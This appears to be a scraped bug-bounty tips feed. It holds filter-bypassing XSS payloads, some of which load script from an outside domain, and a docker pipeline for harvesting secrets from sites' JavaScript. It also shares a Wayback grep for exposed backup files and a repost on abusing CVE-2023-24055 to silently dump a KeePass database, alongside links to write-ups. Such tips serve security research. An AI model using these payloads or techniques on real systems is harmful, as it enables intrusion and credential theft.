Bug bounty Tips

an XSS payload to bypass some waf & filters in Firefox

<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">

#infosec #cybersec #bugbountytips

Retrieves DNS records without any authentication

curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"

Replace example.com with the target domain.

Pre-Auth RCE CyberPanel 0day by Chirag Artani 🔥 Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search 🔎 We also recommend checking out his website and Twitter for more tips: 👉 Site: 3rag.com 👉 Twitter: x.com/Chirag99Artani

Find sensitive files using Wayback

waybackurls 123.com | grep - -color -E "1.xls | \\.tar.gz | \\.bak | \\.xml | \\.xlsx | \\.json | \\.rar | \\.pdf | \\.sql | \\.doc | \\.docx | \\.pptx | \\.txt | \\.zip | \\.tgz | \\.7z"

#bugbountytip #bugbounty #bugbountytips

a XSS payload with Alert Obfuscation, for bypass Regex filter

<img src="X" onerror=top[8680439..toString(30)](1337)> <script>top[8680439..toString(30)](1337)</script>

#infosec #cybersec #bugbountytip

Improve your #XSS reports! 🔥 Use our https://X55.is ✨ domain ✅ Replacing alert(1) '-import('//X55.is')-' <Svg OnLoad=import('//X55.is')> ✅ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is>

🇷🇺 Zero-Day by AI: Google Claims World First As AI Finds 0-Day Security Vulnerability. https://www.forbes.com/sites/daveywinder/2024/11/04/google-claims-world-first-as-ai-finds-0-day-security-vulnerability/

📌 Automated JavaScript Secret Detection 1 - Collect alive domains

docker run -v $(pwd):/src projectdiscovery/subfinder:latest -dL /src/domains -silent -o /src/subdomains
docker run -v $(pwd):/src projectdiscovery/dnsx:latest -l /src/subdomains -t 500 -retry 5 -silent -o /src/dnsx
docker run -v $(pwd):/src projectdiscovery/naabu:latest -l /src/dnsx -tp 1000 -ec -c 100 -rate 5000 -o /src/alive_ports
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/alive_ports -t 100 -rl 500 -o /src/alive_http_services

2 - Collect JS files for analysis (getJS)

docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links

3 - Search for secrets in JS files

docker run -v $(pwd):/src projectdiscovery/nuclei:latest -l /src/js_links -tags token,tokens -es unknown -rl 500 -c 100 -silent -o /src/secret-results

or you can use trufflehog instead of nuclei

docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/js_links -t 100 -rl 500 -sr -srd /src/js_response
docker run --rm -it -v "$PWD:/src" trufflesecurity/trufflehog:latest filesystem /src/js_response/response --only-verified --concurrency=50

#bugbounty #bugbountytips

32 vulnerabilities in IBM Security Verify Access - IT Security Research by Pierre https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html

Template Engines Injection 101 https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756

Taming Post Claps https://medium.com/medium-eng/taming-post-claps-273d97ce1ced

7 Tips for bug bounty beginners https://blog.intigriti.com/hacking-tools/7-tips-for-bug-bounty-beginners

Easy logic bug that leaks the email for every user: https://medium.com/@banertheinrich/easy-logic-bug-that-leaks-the-email-for-every-user-ef2d9d0cf088?source=rss------bug_bounty-5

😈 [ Diego Capriotti @naksyn ] This has been one of my favorites for a while, but now it's time to let it go. Here's my preferred way of getting the KeePass db that we often hunt for: downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database. The target can remain clean and you can simply check for the dump creation. KeePass version 2.53 can still open kdbx created with the version 2.57 and if using a proper xml the user will likely notice nothing. Update alerts can also be disabled within the xml. 🔗 https://gist.github.com/naksyn/6d5660dacd0730498a274b85d62a77e8 🐥 [ tweet ]

My new post sharing an investigation on a $243M theft from last month which lead to multiple arrests and $9M+ frozen https://x.com/zachxbt/status/1836752923830702392?

💉 Awesome Sqlmap Tampers. • SQLMap Tamper List; • space2comment.py; • randomcase.py; • between.py; • charencode.py; • equaltolike.py; • appendnullbyte.py; • base64encode.py; • chardoubleencode.py; • commalesslimit.py; • halfversionedmorekeywords.py; • modsecurityversioned.py; • space2hash.py; • overlongutf8.py; • randomcomments.py; • unionalltounion.py; • versionedkeywords.py; • space2dash.py; • multiplespaces.py; • nonrecursivereplacement.py; • space2comment.py; • equaltolike.py; • space2tab.py; • between.py; • charencode.py; • space2dash.py; • lowercase.py; • How to write Tamper Script for SQLMap. #Sqlmap

Thank you soo much for each and everyone🥳❤️

Guys 2000 followers❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️